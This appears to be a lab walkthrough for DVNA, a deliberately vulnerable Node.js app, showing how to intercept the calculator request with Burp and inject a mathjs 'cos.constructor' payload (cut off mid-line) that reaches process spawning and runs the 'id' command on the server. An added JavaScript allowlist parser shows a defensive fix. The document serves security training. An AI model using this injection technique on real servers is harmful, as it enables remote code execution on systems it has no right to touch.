infosecgirls
Appsec
Using Components with Known Vulnerabilities - DVNA

Last updated 4 years ago

Using Components with Known Vulnerabilities

mathjs Remote Code Execution

The version of the mathjs library used in the application has a remote code execution vulnerability that allows an attacker to run arbitrary code on the server.

The calculator implementation uses mathjs.eval to evaluate user input at

Step 1: Log in to the application and navigate to /app/calc. Notice that there is a simple calculator function.

Step 2: Enter a math expression such as 2+4 and press Enter. Intercept this request using Burp.

Step 3: Send the intercepted request to Burp Repeater (CTRL+R) and navigate to Repeater (CTRL+SHIFT+R).

Step 4: Forward the request and notice that the expression is evaluated and the application returns an HTTP 200 response.

There is no input validation either, presumably because the input is expected to be a math expression and will therefore contain symbols.

Step 5: Modify the value of eqn in the POST request body to cos.constructor("spawn_sync = process.binding('spawn_sync'); normalizeSpawnArguments = f


Forward the request and notice that the response contains the output of the id command executed on the remote server.
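As an added example (not the code of DVNA or of mathjs), one way to keep untrusted calculator input out of reach of an expression evaluator: an allowlist parser that accepts only arithmetic, parentheses and a fixed set of functions, so a value such as the cos.constructor(...) payload above is rejected before anything is evaluated. The function set, the 200-character cap and the names below are assumptions made for the example.

```javascript
// Added example (not DVNA's or mathjs's code); the function set and 200-char cap are assumptions.
const FUNCS = { cos: Math.cos, sin: Math.sin, sqrt: Math.sqrt, abs: Math.abs };
const OPS = { '+': (a, b) => a + b, '-': (a, b) => a - b, '*': (a, b) => a * b, '/': (a, b) => a / b };
function tokenize(src) {   // every char must match one alternative; group 4 catches the disallowed ones
  const tokens = [];
  for (const m of src.matchAll(/(\d+(?:\.\d+)?)|([a-z]+)|([-+*/^()])|\s+|(.)/g)) {
    if (m[4] !== undefined) throw new Error(`rejected character ${JSON.stringify(m[4])}`);
    if (m[1] !== undefined) tokens.push({ t: 'num', v: Number(m[1]) });
    else if (m[2] !== undefined) tokens.push({ t: 'id', v: m[2] });
    else if (m[3] !== undefined) tokens.push({ t: 'op', v: m[3] });
  }
  return tokens;
}
function evaluate(tokens) {   // recursive descent: sum < term < unary minus < power (right-assoc) < atom
  let i = 0;
  const isOp = (v) => i < tokens.length && tokens[i].t === 'op' && tokens[i].v === v;
  const take = (v) => {       // consume the next token, optionally requiring a specific value
    const tok = tokens[i++];
    if (!tok || (v !== undefined && tok.v !== v)) throw new Error(`expected ${v ?? 'a token'}`);
    return tok;
  };
  const chain = (next, ops) => () => {   // left-associative binary operators
    let x = next();
    while (ops.some((op) => isOp(op))) { const op = take().v; x = OPS[op](x, next()); }
    return x;
  };
  const unary = () => (isOp('-') ? (take(), -unary()) : power());
  const power = () => { const b = atom(); return isOp('^') ? (take(), b ** unary()) : b; };
  const term = chain(unary, ['*', '/']);
  const sum = chain(term, ['+', '-']);
  function atom() {
    const tok = take();
    if (tok.t === 'num') return tok.v;
    if (tok.t === 'id') {     // own properties of FUNCS only, so prototype members such as constructor are never reachable
      if (!Object.prototype.hasOwnProperty.call(FUNCS, tok.v)) throw new Error(`unknown function ${tok.v}`);
      take('('); const arg = sum(); take(')'); return FUNCS[tok.v](arg);
    }
    if (tok.v === '(') { const x = sum(); take(')'); return x; }
    throw new Error(`unexpected ${tok.v}`);
  }
  const result = sum();
  if (i !== tokens.length) throw new Error(`trailing input ${tokens[i].v}`);
  return result;
}
function safeCalc(eqn) {      // handler entry point: a finite number, or an error the handler turns into HTTP 400
  if (typeof eqn !== 'string' || eqn.length > 200) throw new Error('invalid eqn');
  const r = evaluate(tokenize(eqn));
  if (!Number.isFinite(r)) throw new Error('result is not finite');
  return r;
}
```

Because identifiers are resolved only against the own properties of FUNCS and a `.` is not a valid character, neither `cos.constructor(...)` nor a bare `constructor(...)` can reach a JavaScript function object.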

https://www.npmjs.com/package/mathjs
http://192.168.56.101:9090/app/calc